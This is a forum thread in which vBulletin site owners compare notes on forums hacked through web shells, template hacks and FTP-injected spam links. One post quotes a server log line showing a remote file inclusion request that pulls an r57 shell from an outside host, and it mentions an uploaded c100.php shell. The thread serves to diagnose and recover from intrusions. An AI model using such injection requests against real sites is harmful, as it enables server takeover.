vbulletin hacked

[dtv100]

maybe problem was this http://www.vbulletin.com/forum/showthread.php?t=282133

[ssslippy]

You wouldn't happen to have HTML enabled anywhere?

[fattony69]

Quote:

Originally Posted by dtv100

maybe problem was this http://www.vbulletin.com/forum/showthread.php?t=282133

I got hacked an hour after I installed it. :erm:

Quote:

Originally Posted by ssslippy

You wouldn't happen to have HTML enabled anywhere?

Of course not. I know that is a no no.

[Bilderback]

I did find this in log.. anyone?
GET /index.php?vb=include('http://meto5757.by.ru/shells/r57.txt');

Upon further research, they tried multiple file exploits finally ending in the faq.php
which got a c100.php file uploaded to root

I didnt post the shell I found but I sent it to Marco via PM

[PAKIDIL]

Quote:

Originally Posted by Digital Jedi

PAKIDIL, I recommend you read this before you continue to tell people not to install modifications with 777'd folders: Why chmod 777 is NOT a security risk

i am just sharing my experience and telling people could be this may be the issue .my forum hacked and i know how they hacked thtz why i am sharing .now i am still runing forum widout allowing attachment ,no folder is on chmd 777 and plus the post u quote is not mine i just copy paste from big company hostgator. they are best in forum running web hosting.they have lots of vbulletin forum running on their server and always solve this kind of issue's to their client and the link you posted is from simplemachines and we are using vbulletin soo may be its not problem with them.

[engedi05]

My Forum got hacked as well.. by virusman... my forum url: http://www.hyipsensor.net/board

Please check whether it is the same problem as stated in this thread..

[Bilderback]

Yes, same problem
It appears that there is a backdoor on the bluehost server.
I have seen many queries to search engines for that specific shared ip address.
Its either in your spacer_open templates or your index.php was rewritten.
Also look for a c100.php file in your forum root.
You can contact me if you need assistance.

EDIT: I just checked other files in your board and it appears that the template hack was executed.
Look for some weird code in your spacer_open(s)

[Digital Jedi]

Quote:

Originally Posted by PAKIDIL

i am just sharing my experience and telling people could be this may be the issue .my forum hacked and i know how they hacked thtz why i am sharing .now i am still runing forum widout allowing attachment ,no folder is on chmd 777 and plus the post u quote is not mine i just copy paste from big company hostgator. they are best in forum running web hosting.they have lots of vbulletin forum running on their server and always solve this kind of issue's to their client and the link you posted is from simplemachines and we are using vbulletin soo may be its not problem with them.

My point is, if they've hacked into your server, your file permissions aren't going to matter. They will have access to everything anyway.

[stryderunknown]

From what I remember when I use to follow some exploits that occurred on a notorious site for logging site defacements. Usually groups don't just hack the individual website but actually obtain rights over entire servers (This was because there was a score system for how many defacements the groups obtained). They would exploit code that Host provider have installed on their systems and doesn't effect just one website but potentially their whole clientèle base.

If you can't find fault in your software or mods (If it's server side then they would rewrite the indexes as a BATCH), I would seriously suggest informing your Host or enquiring at the very least if they are having problems.

[Quarterbore]

Seeing a trend here, I got hit last night and mine was a bit different as they seemed to get FTP access and they ran a script that started adding porn links in all the files on the server. I have full off-server backups but it still took about 4-5 hours to delete everything off there and go to a backup.

My issue may be unrelated or it may be related...

I do know it was a bot that hit my site as they changed hundreds of files in about 20-minutes. I have copies of the code they inserted as well (darned porn links).